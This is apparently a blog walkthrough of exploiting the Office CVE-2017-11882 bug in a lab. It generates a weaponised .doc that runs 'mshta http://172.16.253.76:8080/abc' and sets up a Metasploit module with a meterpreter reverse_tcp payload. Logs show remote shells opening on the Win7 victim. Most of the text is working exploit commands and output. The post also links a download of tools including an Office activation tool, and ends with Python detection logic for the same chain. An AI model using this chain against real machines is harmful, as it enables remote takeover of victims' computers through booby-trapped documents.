Around noon I received a pushed vulnerability alert. Searching online, I saw that quite a few experts had already written scripts that generate the malicious doc file as well as a PoC for msf. This post records exploiting the CVE-2017-11882 vulnerability under Msf.
On November 14, 2017, Microsoft released its November security patch update. The item that drew the most attention was the quiet fix for an Office remote code execution vulnerability (CVE-2017-11882) that had been lurking for 17 years. It is an Office memory corruption vulnerability that affects every currently popular Office version; an attacker can use it to execute arbitrary commands as the currently logged-in user. Because of the wide impact, the Jinjing Security Research Team (金睛安全研究團隊) kept monitoring attack activity related to the vulnerability after its disclosure. On November 19 it observed a PoC circulating online and promptly analysed the related samples. At present, Microsoft's antivirus is the only product worldwide that detects the sample.
a) TCP reverse connection: kali 172.16.253.76
b) System with Office 2013 installed: win7 172.16.253.4
1. The PoC used by Msf
2. Office 2013, activation tool
3. Win7 Ultimate ISO image
The tools above have been packaged; download address:
Link: http://pan.baidu.com/s/1o8635Om  Password: xl91
1. Generate the doc
# Install and start nginx
[root@ihoneysec ~]# yum -y install nginx
[root@ihoneysec ~]# cd /usr/share/nginx/html/
[root@ihoneysec html]# systemctl start nginx
# Download the Python script that generates the doc
[root@ihoneysec ~]# git clone https://github.com/Ridter/CVE-2017-11882.git
[root@ihoneysec ~]# cd CVE-2017-11882/
[root@ihoneysec CVE-2017-11882]# ls
Command109b_CVE-2017-11882.py  Command43b_CVE-2017-11882.py  example  README.md
# Generate a test doc
[root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve.doc
[*] Done ! output file --> cve.doc
[root@ihoneysec CVE-2017-11882]# cp cve.doc /usr/share/nginx/html/
# Generate the doc used with msf
[root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "mshta http://172.16.253.76:8080/abc" -o cve2.doc
[*] Done ! output file --> cve2.doc
[root@ihoneysec CVE-2017-11882]# cp cve2.doc /usr/share/nginx/html/
# Place them in the web root
[root@ihoneysec CVE-2017-11882]# ls /usr/share/nginx/html/
404.html  50x.html  cve.doc  cve2.doc  index.html  nginx-logo.png  poweredby.png
2. Test that the calc.exe calculator pops up normally
3. Configure the PoC in msf on kali:
root@kali:~# cd /
# Put the downloaded vulnerability module in any msf directory
root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
# Check the IP address
root@kali:/mnt/hgfs/kalishare# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.253.76  netmask 255.255.0.0  broadcast 172.16.255.255
        inet6 fe80::20c:29ff:fef5:82af  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:f5:82:af  txqueuelen 1000  (Ethernet)
        RX packets 3136  bytes 987402 (964.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 255  bytes 20912 (20.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
# Start the postgresql service and open msf
root@kali:/mnt/hgfs/kalishare# service postgresql start
root@kali:/mnt/hgfs/kalishare# msfconsole
...
       =[ metasploit v4.16.6-dev                         ]
+ -- --=[ 1683 exploits - 964 auxiliary - 297 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
# Search for the cve_2017_11882 module
msf > search cve_2017_11882
Matching Modules
================
   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   exploit/windows/smb/cve_2017_11882                   normal  Microsoft Office Payload Delivery
# Use the module
msf > use exploit/windows/smb/cve_2017_11882
# Set the payload to reverse tcp
msf exploit(cve_2017_11882) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
# Set the local IP
msf exploit(cve_2017_11882) > set lhost 172.16.253.76
lhost => 172.16.253.76
# Set the URI path; it must match what was configured when generating the doc in step 1
msf exploit(cve_2017_11882) > set URIPATH abc
URIPATH => abc
# Check the current configuration
msf exploit(cve_2017_11882) > show options
Module options (exploit/windows/smb/cve_2017_11882):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  abc              no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.253.76    yes       The listen address
   LPORT     4444             yes       The listen port
...
# After the exploit is launched, msf listens on local port 8080; when the win7 machine opens the doc and it requests 172.16.253.76:8080/abc, a reverse TCP session comes back to port 4444
msf exploit(cve_2017_11882) > exploit
[*] Exploit running as background job 0.
# Listening starts
[*] Started reverse TCP handler on 172.16.253.76:4444
msf exploit(cve_2017_11882) > [*] Using URL: http://0.0.0.0:8080/abc
[*] Local IP: http://172.16.253.76:8080/abc
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://172.16.253.76:8080/abc"
msf exploit(cve_2017_11882) > [*] 172.16.253.4     cve_2017_11882 - Delivering payload
[*] Sending stage (179267 bytes) to 172.16.253.4
# Reverse TCP connection received
[*] Meterpreter session 1 opened (172.16.253.76:4444 -> 172.16.253.4:49272) at 2017-11-23 15:14:06 +0800
[*] 172.16.253.4     cve_2017_11882 - Delivering payload
[*] Sending stage (179267 bytes) to 172.16.253.4
[*] Meterpreter session 2 opened (172.16.253.76:4444 -> 172.16.253.4:49274) at 2017-11-23 15:14:17 +0800
msf exploit(cve_2017_11882) >
# List the reverse sessions that have been established
msf exploit(cve_2017_11882) > sessions
Active sessions
===============
  Id  Type                     Information             Connection
  --  ----                     -----------             ----------
  1   meterpreter x86/windows  win7-PC\win7 @ WIN7-PC  172.16.253.76:4444 -> 172.16.253.4:49272 (172.16.253.4)
# Enter the session with id 1
msf exploit(cve_2017_11882) > sessions -i 1
[*] Starting interaction with 1...
# Verify that the reverse connection comes from the win7 machine's IP
meterpreter > ipconfig
Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:72:2e:7d
MTU          : 1500
IPv4 Address : 172.16.253.4
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::c15d:3813:94ec:d6c8
IPv6 Netmask : ffff:ffff:ffff:ffff::
......
# Enter command mode
meterpreter > shell
Process 2924 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
# Check the current system users and hostname
C:\Windows\system32>net user
net user

\\WIN7-PC 的用户帐户
-------------------------------------------------------------------------------
Administrator            Guest                    win7
命令成功完成。

C:\Windows\system32>
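From the defender's side, the delivery chain this walkthrough produces leaves a distinctive process-creation trail: the Equation Editor component (EQNEDT32.EXE, the Office process that hosts this bug) or another Office host spawning mshta.exe or cmd.exe, in the msf case with the http://172.16.253.76:8080/abc URL on the command line. The following Python detection logic is an added example, not code from the original post or from the Ridter script; the events are constructed Sysmon-style records, and the EQNEDT32.EXE install path and the severity labels are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (not real logs). The first two mirror
# the chain this post produces: the Equation object spawns the -c command used when the
# doc was generated ("mshta http://..." for msf, "cmd.exe /c calc.exe" for the test doc).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://172.16.253.76:8080/abc"},
    {"parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c calc.exe"},
    {"parent": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe "http://172.16.253.76:8080/abc"'},
    {"parent": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"parent": r"C:\Windows\explorer.exe",          # benign: parent is not an Office host
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Windows\System32\setup.hta"},
]

# Office hosts that have no business launching script hosts or shells (EQNEDT32.EXE is
# the Equation Editor; its path above is an assumed default install location).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Severity label for one process-creation event, or None when it does not match."""
    parent, child = basename(event["parent"]), basename(event["image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    if parent == "eqnedt32.exe":          # Equation Editor never legitimately spawns these
        return "critical"
    if URL_RE.search(event["cmdline"]):   # Office -> mshta/cmd pulling a remote URL (stager)
        return "high"
    return "medium"

def scan(events):
    """Return (severity, cmdline) for every matching event, in input order."""
    hits = []
    for event in events:
        severity = classify(event)
        if severity:
            hits.append((severity, event["cmdline"]))
    return hits
```

Feeding the endpoint's real process-creation events into `scan` in place of `SAMPLE_EVENTS` surfaces the calc.exe test and the msf mshta stager from this walkthrough as the two critical hits.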